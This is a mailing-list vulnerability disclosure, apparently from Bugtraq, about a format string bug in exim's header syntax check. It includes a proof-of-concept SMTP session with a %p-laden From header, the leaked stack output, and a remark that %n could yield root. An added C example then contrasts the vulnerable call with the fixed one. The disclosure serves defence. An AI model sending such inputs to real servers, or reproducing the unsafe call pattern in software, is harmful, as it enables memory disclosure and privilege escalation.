Hi BugTrackers

Just a little bug to tell:

THE BUG
-------

accept.c, line 2506:

  else if (smtp_reply != NULL) moan_smtp_batch(NULL, smtp_reply);

while moan_smtp_batch is like this:

  moan_smtp_batch(char *cmd_buffer, char *format, ...)

So when smtp_reply contains format strings, it gets transformed by
moan_smtp_batch().

Why did I say that it's a little bug?
-------------------------------------

This piece of code is only executed when exim is configured to check
incoming mails' headers: /etc/exim.conf should have an option set:

  headers_check_syntax

By default it's turned OFF. Only a few people turn it on.
So it's NOT vulnerable BY DEFAULT.

Exploitation:
-------------

Try this:

===8<======8<=======8<======
lez:~$ /usr/sbin/exim -bS
mail from:lez@lez
rcpt to:hax0r@lez
data
From:@@%p%p%p%p%p%p%p%p%p%p
.
===8<======8<=======8<=======

Somewhere in the answers you should see:

550 Syntax error in 'From' header: domain missing or malformed: failing address is: @@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40

If you change the %p's to %s's, you get a segfault. With a carefully
constructed thing, it's easy to overwrite the saved eip with %n's and get
root out of this bug. No exploit yet, but after the many local format bug
exploits it's not a big work to write one for a skilled man.

--
Megyer Laszlo (Lez)
lezat_private
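The bug pattern the post describes, as an added example that is not part of the original message and is not exim's code: a printf-style logger with the same `(cmd_buffer, format, ...)` shape, the vulnerable call that hands the attacker-influenced reply to it as the format string, and the fixed call that passes the reply as data behind a fixed `"%s"`. The logger name `moan_like`, the buffer sizes, the `count_conversions` helper and the sample header value are assumptions made for this example. The sample input uses `%%` rather than `%p`/`%n` so that the demonstration stays deterministic; with real conversions the vulnerable path reads (or with `%n` writes) through the stack exactly as the post says.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for a printf-style logger such as moan_smtp_batch(): same
 * "(cmd_buffer, format, ...)" shape, but this is NOT exim's code. The
 * format attribute makes gcc/clang warn under -Wformat-security when a
 * non-literal string is passed as the format argument (the vulnerable
 * call below triggers that warning; the fixed call does not). */
static char last_msg[512];

__attribute__((format(printf, 2, 3)))
static void moan_like(const char *cmd_buffer, const char *format, ...)
{
    va_list ap;
    (void)cmd_buffer;
    va_start(ap, format);
    vsnprintf(last_msg, sizeof last_msg, format, ap);
    va_end(ap);
}

/* Vulnerable pattern: the reply text itself becomes the format string,
 * so any % directives in it are interpreted by vsnprintf(). */
const char *report_vulnerable(const char *smtp_reply)
{
    moan_like(NULL, smtp_reply);        /* cf. moan_smtp_batch(NULL, smtp_reply) */
    return last_msg;
}

/* Fixed pattern: the format is a literal; the reply is only ever data. */
const char *report_fixed(const char *smtp_reply)
{
    moan_like(NULL, "%s", smtp_reply);
    return last_msg;
}

/* Builds a 550 line shaped like the one in the post, embedding the
 * rejected header value before the text reaches the logger. */
const char *build_reply(char *buf, size_t len, const char *from_header)
{
    snprintf(buf, len,
             "550 Syntax error in 'From' header: domain missing or malformed: "
             "failing address is: %s", from_header);
    return buf;
}

/* Defensive check: number of '%' characters that a printf-family function
 * would treat as the start of a conversion ("%%" pairs are literal). */
int count_conversions(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%')
            s++;            /* skip the escaped pair */
        else
            n++;
    }
    return n;
}

int main(void)
{
    char reply[256];
    /* Constructed header value (assumption for the demo). */
    const char *from = "@@100%%done";

    build_reply(reply, sizeof reply, from);
    printf("reply as built:  %s\n", reply);
    printf("vulnerable path: %s\n", report_vulnerable(reply));
    printf("fixed path:      %s\n", report_fixed(reply));
    printf("conversions in \"@@%%p%%p%%p\": %d\n", count_conversions("@@%p%p%p"));
    return 0;
}
```

The vulnerable path turns the `%%` in the header into a single `%`, proving the reply was parsed as a format; the fixed path reproduces it byte for byte. A `%p` or `%n` in the same position would consume or write through stack slots that the caller never supplied, which is the condition the post exploits.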
This archive was generated by hypermail 2b30 : Wed Jun 06 2001 - 09:51:56 PDT